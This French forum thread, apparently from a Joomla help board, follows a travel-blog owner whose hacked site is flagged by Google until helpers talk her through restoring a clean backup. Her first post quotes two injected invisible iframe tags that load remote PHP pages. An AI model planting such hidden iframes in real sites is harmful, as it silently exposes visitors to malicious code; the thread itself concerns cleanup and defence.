Mon site est devenu malveillant...que faire help !

Réduire
Ce sujet est fermé.
X
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Mon site est devenu malveillant...que faire help !

    Bjr, mon site www.cavagnis-tour.com relate mon tour du monde de 6 ans en famille en camping car. Il y a 4 jours, on a parlé de nous sur Les Maternelles sur France5 résultat pleins de connexions et des pirates aussi car notre site est maintenant catalogué malveillant pour Google. Que faire ? j'ai changé les mots de passe et je l'ai mis hors ligne pour éviter de perturber les visiteurs mais comment le réparer ? Google m'a donné des infos, ainsi que deux codes succeptibles d'etre en cause :

    <iframe src="http://theprintshop.co.th/hqtwqov.php" width=1
    height=1 style="visibility: hidden">

    <iframe src="http://www.antaram.ch/awdwsef.php" width=1 heig
    ht=1 style="visibility: hidden">

    mais que dois-je faire ? ou dois je chercher ces lignes ? dois je les supprimer ?
    c'est un site amateur et je ne sais pas vraiment manier le code !!!

    merci

  • #2
    Re : Mon site est devenu malveillant...que faire help !

    Bonjour Juliette

    Que faire ? Appeler un marabout (pardon, elle était facile)

    La plupart du temps, les injections de code malveillants se font dans le fichier index.php de ton template mais avant même "d'aller voir", la meilleure des choses, c'est de récupérer un backup que tu as fait alors que le site était sain et de le restaurer. (Tu en as, n'est-ce pas?).

    Si tu n'as pas de backup (???), connecte-toi avec ton client FTP sur ton site, va dans ton dossier /templates/xxxx (où xxx est le nom du template que tu utilises) et édite le fichier index.php. Cherche après le code de ces deux iframes. Si ton attaquant est "simpliste", tu vas pouvoir les trouver et les supprimer. Avec une chance inouïe, ton attaquant à 8 ans et ton nettoyage suffira. J'exagère un peu mais c'est pour insister sur le fait qu'une attaque, en général, vérole plusieurs fichiers et c'est loin d'être simple de l'éradiquer. La meilleure, toujours, solution est de restaurer une version clean de ton site.

    Bonne journée.
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

    Commentaire


    • #3
      Re : Mon site est devenu malveillant...que faire help !

      Bonjour,

      Ton site est même blacklisté ! Ce qui doit donné une injection de script et de sql, ne traine pas trop car Ovh va tout bloquer.

      L'ennuyeux est qu'il semble que tu as installé ton site via leur système, ce qu'il ne faut pas faire. Enfin chez Ovh tu peux remonter une sauvegarde, à condition qu'elle soit saine, sinon un gros travail t'attend de toutes les façons.

      Commentaire


      • #4
        Re : Mon site est devenu malveillant...que faire help !

        Merci Cava et Zepelin,

        j'ai une sauvegarde de 3 jours avant que google ne me catalogue malveillant, comment savoir si cette sauvegarde est saine ?
        je suis en train de la télécharger par ftp mais avec le wifi ou je suis au Savador... 22h de telechargement !

        que signifie etre black lister en plus d etre malveillant ?

        comment faire pour comparer des fichiers systemes et voir ce qui a été modifié ? je viens de regarder les lignes du fichier index.php mais a priori je n'ai pas trouvé de iframe quelquechose...

        quelle m... pourquoi on s'attaque a mon site qui n'a rien de commercial meme pas de pub ?!

        merci

        Commentaire


        • #5
          Re : Mon site est devenu malveillant...que faire help !

          autre question, si je remonte ma sauvegarde, comment faire pour que google me repasse au vert ? merci

          Commentaire


          • #6
            Re : Mon site est devenu malveillant...que faire help !

            Les sauvegardes chez Ovh remontent plus loin que cela en temps. il faut donc cibler la bonne avant attaque.

            je suis en train de la télécharger par ftp mais avec le wifi ou je suis au Savador... 22h de telechargement !
            Il faudra trouver une solution plus viable, car nettoyer, mettre à jour et protéger ton site va prendre à ce dompte là des semaines !

            comment faire pour comparer des fichiers systemes et voir ce qui a été modifié ?
            C'est un travail de très longue haleines, attention compétences requises !

            quelle m... pourquoi on s'attaque a mon site qui n'a rien de commercial meme pas de pub ?!
            Les malveillants font des recherches sur le web et débusquer des sites non maintenus, après ce n'est qu'un "jeu d'enfants" pour le véroler.

            que signifie etre black lister en plus d etre malveillant ?
            Que ton site va être radié des moteurs de recherche, normal puisqu'un script redirige ton site vers un code dangereux.

            Commentaire


            • #7
              Re : Mon site est devenu malveillant...que faire help !

              En remontant ma sauvegarde, tout est rentrè dans l'ordre.... Mais il faut vraiment que je passe en 2.5 pour maintenir le site a jour en terme de protection... Merci

              Commentaire

              Annonce

              Réduire
              Aucune annonce pour le moment.

              Partenaire de l'association

              Réduire

              Hébergeur Web PlanetHoster
              Travaille ...
              X